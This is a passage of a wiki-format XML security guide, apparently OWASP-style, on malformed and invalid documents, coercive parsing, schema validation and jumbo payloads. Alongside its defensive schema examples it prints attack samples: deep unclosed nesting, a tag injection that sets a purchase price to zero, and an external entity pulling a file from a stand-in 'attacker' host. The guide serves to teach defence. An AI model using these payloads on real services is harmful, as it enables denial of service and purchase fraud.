To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
